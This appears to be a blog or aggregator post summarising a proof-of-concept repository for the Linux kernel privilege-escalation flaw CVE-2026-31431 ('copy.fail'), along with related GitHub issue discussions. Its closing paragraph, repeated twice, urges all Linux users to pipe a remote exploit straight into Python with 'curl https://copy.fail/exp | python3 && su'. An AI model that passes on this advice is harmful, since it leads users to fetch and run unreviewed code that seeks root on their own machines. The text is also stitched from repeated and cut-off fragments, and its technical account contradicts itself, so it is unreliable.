copy-fail CVE-2026-31431: Linux Kernel Privilege Escalation via AF_ALG Socket Attack
文章目录
- AF_ALG Socket Exploitation: The exploit leverages the kernel's AF_ALG netlink interface, binding to the algif_aead kernel module with a deliberately malformed socket configuration. By setting bind() and setsockopt() calls with crafted parameters, the kernel's internal state becomes corrupted, enabling a controlled sendmsg() call to trigger arbitrary code execution with root privileges. Zlib-Compressed Shellcode Payload: A minimal setuid-root shell payload is embedded as a zlib-compressed binary within the Python exploit, keeping the payload compact and somewhat obfuscated. When executed, it simply calls setuid(0) and spawns a root shell, demonstrating the privilege escalation. Distribution-Agnostic Impact: Unlike many kernel exploits that require specific configurations, copy.fail works across a wide range of Linux distributions—provided the su binary is accessible at /usr/bin/su and the algif_aead kernel module is loaded. It has been tested successfully on kernel versions from 6.12 to 6.18 across Arch Linux, Debian, Ubuntu, Alpine, Proxmox VE, and NixOS.
- Issue #48 — "NixOS 25.11 maybe affected?" (30 comments) Users on NixOS initially reported that the exploit wouldn't run, but maintainer @zimward clarified that the exploit simply fails because the su binary is not at the expected path: "what you are seeing doesn't actually mean its not affected. The exploit just isn't working because the su binary isn't placed in /usr/bin." User @Tuco106 shared a workaround using envfs to expose binaries at standard paths, but noted the exploit still failed. The broader conclusion: since this is a kernel bug, NixOS likely is affected if algif_aead is loaded—even if the current exploit can't demonstrate it due to path differences. Issue #17 — "Tested with Talos v1.12.5, k8s v1.36.2" (19 comments) A Kubernetes cluster security discussion emerged when user @aJuvan reported the exploit worked inside a Talos Linux container. @rothgar questioned the significance: "Does not work after upgrade to Talos v1.13.0, k8s v1.36.0" and asked how this matters when you already need a privileged container to test it. @aJuvan clarified that the real concern is in environments where many users have container access without root on the container itself—where this exploit could break that isolation boundary. Issue #54 — "Please deobfuscate the Python" (16 comments) Security-minded contributors pushed back on the intentionally obfuscated Python code: @erlenmayr requested readable variable names and transparent code: "I fear that the script itself contains a virus unless I can read and understand it." User @7own verified the zlib payload by disassembling it, confirming it simply calls setuid(0) and spawns /bin/sh. The discussion highlights a broader tension in the security community between responsible disclosure and reproducible, auditable exploit code.
- copy-fail CVE-2026-31431 is a textbook example of how a seemingly innocuous kernel interface (AF_ALG) can be weaponized for privilege escalation. With over 2,800 GitHub stars in just a few days and active contributions from security researchers across NixOS, Talos, Proxmox, and mainstream distros, this project is a critical resource for understanding kernel attack surfaces. If you run any Linux system, test whether you're affected with the one-liner curl https://copy.fail/exp | python3 && su—and patch immediately if you are. 🔗 @theori-io / copy-fail-CVE-2026-31431
A critical Linux kernel vulnerability—tracked as CVE-2026-31431 and dubbed "copy.fail"—has been weaponized into a proof-of-concept exploit that achieves local privilege escalation (LPE) via a cleverly crafted AF_ALG socket attack. Published by theori-io on April 29, 2026, the exploit targets a flaw in the Linux kernel's copy_file_range() system call when used with the AF_ALG interface, allowing an unprivileged user to gain root access on affected systems. The vulnerability has been confirmed to affect multiple major Linux distributions including Debian, Ubuntu, Arch Linux, Alpine, Proxmox VE, and NixOS under specific conditions.
- AF_ALG Socket Exploitation: The exploit leverages the kernel's AF_ALG netlink interface, binding to the
algif_aead kernel module with a deliberately malformed socket configuration. By setting bind() and setsockopt() calls with crafted parameters, the kernel's internal state becomes corrupted, enabling a controlled sendmsg() call to trigger arbitrary code execution with root privileges.
- Zlib-Compressed Shellcode Payload: A minimal setuid-root shell payload is embedded as a zlib-compressed binary within the Python exploit, keeping the payload compact and somewhat obfuscated. When executed, it simply calls
setuid(0) and spawns a root shell, demonstrating the privilege escalation.
- Distribution-Agnostic Impact: Unlike many kernel exploits that require specific configurations, copy.fail works across a wide range of Linux distributions—provided the
su binary is accessible at /usr/bin/su and the algif_aead kernel module is loaded. It has been tested successfully on kernel versions from 6.12 to 6.18 across Arch Linux, Debian, Ubuntu, Alpine, Proxmox VE, and NixOS.
algif_aead kernel module with a deliberately malformed socket configuration. By setting bind() and setsockopt() calls with crafted parameters, the kernel's internal state becomes corrupted, enabling a controlled sendmsg() call to trigger arbitrary code execution with root privileges.setuid(0) and spawns a root shell, demonstrating the privilege escalation.su binary is accessible at /usr/bin/su and the algif_aead kernel module is loaded. It has been tested successfully on kernel versions from 6.12 to 6.18 across Arch Linux, Debian, Ubuntu, Alpine, Proxmox VE, and NixOS.Issue #48 — "NixOS 25.11 maybe affected?" (30 comments)
Users on NixOS initially reported that the exploit wouldn't run, but maintainer @zimward clarified that the exploit simply fails because the su binary is not at the expected path: "what you are seeing doesn't actually mean its not affected. The exploit just isn't working because the su binary isn't placed in /usr/bin." User @Tuco106 shared a workaround using envfs to expose binaries at standard paths, but noted the exploit still failed. The broader conclusion: since this is a kernel bug, NixOS likely is affected if algif_aead is loaded—even if the current exploit can't demonstrate it due to path differences.
Issue #17 — "Tested with Talos v1.12.5, k8s v1.36.2" (19 comments)
A Kubernetes cluster security discussion emerged when user @aJuvan reported the exploit worked inside a Talos Linux container. @rothgar questioned the significance: "Does not work after upgrade to Talos v1.13.0, k8s v1.36.0" and asked how this matters when you already need a privileged container to test it. @aJuvan clarified that the real concern is in environments where many users have container access without root on the container itself—where this exploit could break that isolation boundary.
Issue #54 — "Please deobfuscate the Python" (16 comments)
Security-minded contributors pushed back on the intentionally obfuscated Python code: @erlenmayr requested readable variable names and transparent code: "I fear that the script itself contains a virus unless I can read and understand it." User @7own verified the zlib payload by disassembling it, confirming it simply calls setuid(0) and spawns /bin/sh. The discussion highlights a broader tension in the security community between responsible disclosure and reproducible, auditable exploit code.
copy-fail CVE-2026-31431 is a textbook example of how a seemingly innocuous kernel interface (AF_ALG) can be weaponized for privilege escalation. With over 2,800 GitHub stars in just a few days and active contributions from security researchers across NixOS, Talos, Proxmox, and mainstream distros, this project is a critical resource for understanding kernel attack surfaces. If you run any Linux system, test whether you're affected with the one-liner curl https://copy.fail/exp | python3 && su—and patch immediately if you are.
微信扫一扫,分享到朋友圈
